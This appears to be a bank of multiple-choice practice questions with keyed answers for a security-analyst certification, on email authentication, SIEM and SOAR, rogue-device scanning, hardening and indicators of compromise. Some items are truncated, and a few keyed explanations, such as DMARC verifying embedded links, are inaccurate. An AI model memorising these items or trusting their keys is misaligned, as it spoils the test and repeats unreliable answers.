Which of the following options describe the benefits of reducing the attack surface and limiting access to sensitive resources? (Select the two best options.) A. It allows for greater transparency in network operations. B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. D. It promotes an increase in the availability of resources.
B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. Limiting access allows for more effective monitoring of network traffic, enhancing the ability to detect and respond to anomalous activity. Reducing the attack surface and limiting access to sensitive resources provide significant benefits to network security, such as reducing the risk of unauthorized access to sensitive data.
A company's security team recently discovered an unknown device connected to their network, and they suspect it could be a rogue device. The team wants to conduct scans and sweeps to locate and remove any unauthorized devices on the network. Which of the following are common types of scans or sweeps the team can use to locate rogue devices in the network? (Select the two best options.) A. Port scanning B. Passive scanning C. Active scanning D. Network mapping
B. Passive scanning C. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.
A security analyst performing security operations on a company's network needs to use PowerShell and shell scripts to automate tasks and streamline processes. Which of the following correctly defines PowerShell and shell script in the context of security operations? A. PowerShell is a set of commands written in a specific language that runs on a Unix-based operating system, while a shell script is a command-line interface that allows you to manage and automate Windows-based operating systems. B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. C. PowerShell and shell script are two different names for the same thing - a command-line interface that allows you to manage and automate operating systems. D. PowerShell and shell script ar
B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. PowerShell facilitates the management and automation of Windows-based operating systems by providing a command-line interface. Shell script is a set of commands written in a specific language that runs on a Unix-based operating system. Although PowerShell and shell script are both tools that automate tasks, they are not interchangeable and require different approaches to accomplish similar tasks.
A security analyst working for a large financial institution is implementing Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) to improve email security for the company. The analyst's company has decided to implement SPF and DKIM to improve email security. Which of the following statements best describes SPF? A. SPF is a cryptographic protocol that ensures message confidentiality. B. SPF is an email authentication method that detects forged sender addresses in emails. C. SPF is a protocol used to encrypt email messages in transit. D. SPF is a protocol used to control access to network resources.
B. SPF is an email authentication method that detects forged sender addresses in emails. SPF is an email authentication method that detects forged sender addresses in emails. SPF verifies that the IP address of the sending mail server matches the IP address specified in the DNS record for the domain from which the email originated.
A cybersecurity analyst for a small company ensures the company's email security by configuring Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). The analyst needs to explain to other employees how SPF and DKIM work together. Which of the following statements correctly explain the role of SPF and DKIM in securing email communications? (Select the two best options.) A. SPF verifies the message content while DKIM verifies the source IP address of incoming messages. B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. D. SPF and DKIM work together to scan for malware.
B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. SPF verifies the source IP address of incoming messages, while DKIM verifies the message content by attaching a digital signature to the email header. Together, they provide a strong defense against email forgery and ensure that email messages are legitimate and trustworthy. Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) are both email authentication protocols that work together to protect against email spoofing and ensure message authenticity.
An IT security analyst is verifying a coworker's email containing a link to a new report. The email seems legitimate, but the analyst notices that the link is obfuscated, suggesting it may be part of a social engineering attack designed to compromise the organization's security. What is the role of obfuscated links in social engineering attacks, and how do they impact IT security operations? (Select the three best options.) A. Obfuscated links are hyperlinks that have been intentionally broken to disrupt the flow of traffic and deny access to specific webpages. B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated l
B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering attacks rely on the exploitation of human vulnerabilities, such as trust and curiosity, to gain unauthorized access to sensitive information or networks. Attackers often use obfuscated links in phishing attacks using social engineering to trick users into clicking on a link that leads to a fake website designed to steal personal information. Attackers often use obfuscated links in social engineering attacks to redirect users to malicious websites that can infect their devices with malware or steal login credentials.
While looking into malware discovered on several workstations, an incident responder realizes it all came from new USB drives the company had recently procured. This could be an example of what type of attack? A. Data enrichment B. Supply chain C. Cousin domain D. Active defense
B. Supply chain Supply chain attacks involve identifying vendors and suppliers and leveraging them to gain access to an organization. Embedding malware into hardware or software an organization uses is an example of a supply chain attack.
A security analyst discovers a malicious process running on one of the servers exfiltrating data to an external IP address. The process has not been detected by the antivirus software. Which of the following is the most likely reason that the malicious process was able to exfiltrate data undetected by the antivirus software? A. The antivirus software was not up-to-date. B. The malicious process was disguised as a legitimate system file. C. The antivirus software was not configured to detect this type of threat. D. The antivirus software was disabled by the attacker.
B. The malicious process was disguised as a legitimate system file. The malicious process exfiltrated the data, and the software did not detect it because it appeared to be a legitimate system file. This is a technique commonly used by attackers to evade detection by security software.
A cybersecurity analyst investigates a suspicious process running on a server. The analyst discovers unexpected output and registry anomalies. Which of the following are true regarding unexpected output and registry anomalies during security operations? (Select the two best options.) A. Unexpected output can be a result of incorrect command syntax. B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. D. Registry anomalies always indicate a security breach.
B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. Malware often tries to conceal its presence on a system by modifying the system's behavior, which can result in unexpected output. Some software installs or updates may modify the Windows registry to change settings or add new ones, causing registry anomalies.
A medium-sized business collects and analyzes all security-related logs from various sources, including web servers and payment processing systems, to detect and respond to security incidents in real time. By implementing centralized logging, the organization hopes to enhance its ability to prevent and mitigate cyber-attacks, as well as comply with regulatory requirements. Which of the following statements accurately describe the role of centralized logging in cyber security operations? A. Centralized logging provides a way for attackers to bypass security measures and access sensitive information. B. Centralized logging makes it difficult for security personnel to monitor system activity. C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. D. Centralized logging only benefits large organizations with complex
C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. Centralized logging is a critical component of a comprehensive cyber security strategy. Consolidating log data from multiple sources, such as servers, firewalls, and network devices, enables security personnel to quickly identify and investigate potential security incidents, as well as monitor system activity in real time.
How are cloud system and network architecture concepts essential for securing hybrid and on-premises systems? A. Cloud system and network architecture concepts are optional and not necessary for securing hybrid and on-premises systems. B. Cloud system and network architecture concepts make securing hybrid and on-premises systems more complex and difficult. C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. D. Cloud system and network architecture concepts only apply to cloud-based systems and do not provide any benefits for on-premises systems.
C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. Cloud system and network architecture concepts provide a unified security framework that applies across hybrid and on-premises systems, enabling organizations to streamline their security operations.
A security analyst is responsible for ensuring a company's serverless infrastructure is secure. Recently, the company had a data breach due to a misconfigured serverless function. Which security measure should the analyst implement to prevent future data breaches on the company's serverless infrastructure? A. Implement network segmentation B. Deploy a firewall C. Configure access control D. Use intrusion detection system (IDS) to monitor functions
C. Configure access control Configuring access control on serverless functions is essential to prevent unauthorized access to the company's data.
A cybersecurity analyst for a large financial services company reviews the company's email security controls and is concerned about the risk of phishing attacks. The analyst decides to implement Domain-based Message Authentication, Reporting, and Conformance (DMARC) to better protect the company's email domain. Which of the following best describes the correlation between embedded links and DMARC? A. DMARC protects against phishing attacks that use embedded links by analyzing email headers. B. DMARC prevents embedded links from being included in emails altogether. C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. D. DMARC only applies to email messages that contain embedded links from untrusted senders
C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an email authentication protocol designed to detect and prevent email spoofing, phishing, and other types of email-based attacks by verifying the authenticity of embedded links and checking the sender's domain against the DMARC record. If the sender's domain fails DMARC authentication, the system can quarantine or reject the email before it reaches the recipient's inbox.
A security analyst reviews the logs of a web server for suspicious activity and notices that someone sent a message to the server with a header that had unusual metadata. Which of the following statements best explains the difference between hashing and headers in security operations? A. Hashing generates unique digital representations of data, while headers encrypt the data. B. Hashing and headers both add metadata to data packets, but hashing only adds metadata to the header, while headers add metadata to the entire packet. C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. D. Hashing and headers both identify the location of a message or data packet in a network.
C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing, a process used in security operations, creates a unique digital representation of data. Headers contain information such as the source and destination of the message, the type of data someone is sending, and other information relevant to the transmission of the data.
What are the security benefits of using software-defined networking (SDN) and virtualization in a network environment? (Select the two best options.) A. Enhanced network security through hardware-based firewalls B. Improved network performance through optimized routing C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment
C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment SDN and virtualization network agility improve network security and facilitate faster deployment of security controls. SDN and virtualization allow the user to identify and respond to security threats more easily.
A company hires a new employee to work in their IT department. The new employee quickly gains the trust of the other coworkers. However, the company soon notices someone is accessing files without authorization and leaking sensitive information. Which of the following best describes the security threat presented in this scenario? A. Social engineering attack B. Phishing attack C. Insider threat D. Malware attack
C. Insider threat This scenario is most reflective of an insider threat, which is someone who uses their position within a company to gain unauthorized access to information or systems.
A security analyst is conducting security operations for a company's network and notices that some users have complained about slow performance and high memory consumption on their devices. Which of the following is a potential cause of high memory consumption? A. Running multiple applications at the same time B. Running outdated operating system software C. Installing software from unverified sources D. Having insufficient disk space on the device
C. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to slow performance and high memory consumption on devices.
A security team found an unidentified device linked to the company's network. The team believes that the device could be a rogue one, and they intend to perform scans and sweeps to identify and eliminate any unauthorized devices on the network. Which two options are the most effective methods of scans or sweeps used to detect rogue devices on a network? (Select the two best options.) A. Port scanning B. Network mapping C. Passive scanning D. Active scanning
C. Passive scanning D. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.
An analyst is reviewing alerts in the security information and events manager (SIEM). Which of the following might lead them to suspect there has been malicious activity? A. Data enrichment B. APIs C. Reverse shell D. Active defense
C. Reverse shell A reverse shell causes a victim system to initiate a shell session with the attacker's host. Reverse shell activity is unlikely to be legitimate, and the analyst should always investigate.
An analyst working for a financial institution has implemented both security orchestration, automation, and response (SOAR) and security information and events manager (SIEM) solutions to enhance their security posture. The analyst receives an alert from the SIEM solution about a potential security threat, and the SOAR solution is triggered to respond to the incident. What is the key difference between SOAR and SIEM solutions in a security operations environment, as shown in the scenario above? A. SOAR solutions are for network traffic monitoring, while SIEM solutions are for incident response. B. SOAR solutions are for threat intelligence analysis, while SIEM solutions are for vulnerability assessment. C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. D. SOAR solutions are for user authentication, while SIEM solutions are for data encrypti
C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. The security information and event management (SIEM) solution alerts the analyst of a potential security threat, while the security orchestration, automation, and response (SOAR) solution responds to the incident. The key difference between SOAR and SIEM solutions is that SOAR solutions are for automating incident response, while SIEM solutions are for collecting and analyzing security data.
A threat actor stole 1,000 credit card numbers from an online retailer. Where might the actor try to sell these records? A. CSIRT B. ISACs C. The deep/dark web D. OSINT
C. The deep/dark web The deep/dark web provides cybercriminals and other malicious actors a platform to conduct illicit activity like planning upcoming attacks, exchanging information, and selling stolen goods.
A company's IT security team discovers that one of their servers is experiencing a significant increase in drive capacity consumption. Upon investigating, the team identifies several malicious processes running in the background. Which of the following best explains the relationship between drive capacity consumption and malicious processes in this scenario? A. The server's drive capacity consumption is causing the malicious processes to run in the background, potentially due to insufficient storage space. B. The malicious processes and the increased drive capacity consumption are unrelated, and the issue could be caused by a hardware failure. C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. D. The server's operating system is corrupted, causing both the increased drive capacity consumption and the malicious processes to occur.
C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. The malicious processes could be causing the server to use up more drive capacity than usual, potentially for the purpose of data exfiltration.
Which of the following are true about the importance of time synchronization, configuration file locations, and logging files in security operations? (Select the two best options.) A. Configuration file locations are typically easy to find and are consistent across different operating systems. B. Time synchronization is only important for Windows-based operating systems. C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents.
C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents. Time synchronization is important because it accurately records events in the correct order across all systems and devices, which is critical for forensic analysis of security incidents. Logging files can provide important information for identifying and investigating security incidents, including information on system and user activity, network traffic, and more.
A security analyst at a financial institution plans to use PowerShell and XML to secure an organization's servers. What is the primary purpose of using XML in this context, and how can PowerShell help in securing the servers? A. XML encrypts sensitive data on the servers, while PowerShell automates security-related tasks on the servers. B. XML detects security threats on the servers, while PowerShell monitors server logs for suspicious activity. C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. D. XML manages server configurations, while PowerShell authenticates users who access the servers.
C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. Extensible Markup Language (XML) describes, stores, and transmits data. PowerShell is a scripting language that automates server hardening and configuration tasks such as managing user accounts, configuring firewalls, and performing system maintenance tasks.
Which of the following is a reason why time synchronization is important in security operations? A. To maintain system performance B. To prevent unauthorized access to sensitive data C. To improve network throughput D. To ensure accurate timestamps on security-related events
D. To ensure accurate timestamps on security-related events Accurate timestamps are critical for forensic analysis of security events and correlating events across systems.
A security analyst working for a financial institution notices abnormal behavior in a workstation's operating system (OS) and identifies multiple unauthorized scheduled tasks and file system anomalies on the affected workstation. Which of the following options is the most likely explanation for these issues? A. The operating system of the workstation is outdated, and the security patches have not been applied, leading to system vulnerabilities that have been exploited. B. An insider threat with access to the workstation is intentionally creating these abnormalities to sabotage the company's security posture. C. The security analyst is experiencing false positives from their security tools, and there are no actual anomalies present. D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks.
D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks. The abnormal OS process behavior, file system anomalies, and unauthorized scheduled tasks on the workstation could be a sign of a virus infection allowing remote attackers to execute arbitrary code and run malicious tasks, leading to system vulnerabilities.
A security analyst needs to select an appropriate tool to detect and analyze malware in an organization's network. The analyst needs to decide which tool is best for detecting and analyzing malware through virtualized environments. Which of the following tools can be used to detect and analyze malware through virtualized environments? A. Wireshark B. Snort C. Malwarebytes D. Cuckoo Sandbox
D. Cuckoo Sandbox Cuckoo Sandbox specifically detects and analyzes malware in a safe and isolated environment. Cuckoo Sandbox is an open-source software for automating malware analysis in a virtualized environment.
An organization's security team is conducting routine system checks and discovers an unauthorized scheduled task on a critical server. Further investigation reveals that the task is set to run every hour, and the task is not part of any known system or application updates. What is the best course of action for the security team to take in response to the unauthorized scheduled task on the critical server? A. Allow the task to run and gather more information before taking any action B. Immediately shut down the critical server to prevent any further unauthorized access C. Schedule a maintenance window to investigate the task at a later time D. Disable the task and monitor the server for any further suspicious activity
D. Disable the task and monitor the server for any further suspicious activity To prevent any further suspicious activity and protect the critical server, the security team should disable the unauthorized scheduled task.
Which of the following is the most important reason to implement system hardening measures in a networked environment? A. To prevent denial-of-service attacks B. To secure data in transit between systems C. To ensure system performance remains optimal D. To reduce the risk of data breaches
D. To reduce the risk of data breaches System hardening measures like removing unnecessary software and services, disabling default accounts, and applying patches and updates help reduce the attack surface of a system and directly reduce the risk of data breaches.
A cybersecurity analyst at a company notices an unusual spike in network traffic that leads to service interruptions. The analyst suspects that this may be due to a security breach. Why could these service interruptions be an indicator of a security breach? A. Service interruption is usually caused by power outages or hardware failures. B. Service interruption is often the result of user error, such as misconfiguration of network devices. C. Service interruption might be caused by routine maintenance tasks that require temporarily taking down the system. D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network.
D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network. Service interruption could indicate an attacker using a denial-of-service attack to overload the network. This is a common tactic used by attackers to disrupt the availability of a network service.
A security analyst investigates a suspected network attack on a company's server. The analyst needs to capture and analyze network traffic to identify the source and type of attack. The analyst decides to use tcpdump and Wireshark for the analysis. Which of the following statements is true about tcpdump and Wireshark when used for network traffic analysis in a security investigation? A. Tcpdump is a network traffic capture tool that identifies the source and type of an attack, while Wireshark is a network traffic analysis tool that visualizes and filters captured traffic. B. Wireshark is a network traffic capture tool that identifies the source and type of an attack, while Tcpdump is a network traffic analysis tool that visualizes and filters captured traffic. C. Tcpdump and Wireshark are both network traffic analysis tools that can be used to visualize and filter captured traffic, but cannot be used to identify t
D. Tcpdump and Wireshark are both network traffic capture and analysis tools that identify the source and type of an attack. Tcpdump and Wireshark capture and analyze network traffic, allowing the identification of the source and type of attacks. Tcpdump captures and displays network traffic through the command-line, while Wireshark offers a more advanced graphical interface to capture and analyze packets, facilitating deep inspection of captured traffic.
An organization has chosen to automatically ingest indicators. This action is most likely intended to ensure what desired threat intelligence attribute? A. Relevancy B. Accuracy C. APT D. Timeliness
D. Timeliness Timeliness is the speed at which the system collects and disseminates threat intelligence. Information rapidly disseminated is timely. This helps ensure it is up-to-date and remains maximally useful.
What is the benefit of hardening the operating system in the context of system and network architecture? A. To increase the number of software applications that can be run on the system B. To reduce the speed of system performance due to the extra security measures C. To improve the aesthetics of the graphical user interface (GUI) D. To decrease the risk of unauthorized access to sensitive data
D. To decrease the risk of unauthorized access to sensitive data Hardening the operating system is a security measure involving configuring the operating system to minimize security vulnerabilities. By implementing security measures such as firewalls, intrusion detection systems, and access control mechanisms, the user significantly reduces the risk of unauthorized access to sensitive data.
A script kiddie is most likely to conduct which of the following operations? A. Setting up a watering hole to steal the login credentials for online bank accounts B. Monitoring the email communications of two European Prime Ministers C. Defacing the website of a prominent global oil company D. Using multiple unsophisticated scanning tools against a public-facing website
D. Using multiple unsophisticated scanning tools against a public-facing website Script kiddie refers to an unsophisticated actor who uses readily available hacker tools. Often a script kiddie has a limited understanding of the tools they are using.
Which of the following is a significant difference between containerization and virtualization in the context of security operations? A. Containerization provides a higher level of isolation between the container and the host operating system compared to virtualization. B. Virtualization provides faster resource allocation than containerization. C. Containerization enables multiple operating systems to run on a single physical machine, while virtualization does not. D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not.
D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not. The primary difference between containerization and virtualization is that virtualization allows multiple virtual machines to run different operating systems on a single physical machine, while containerization allows multiple containers to run on a single operating system instance.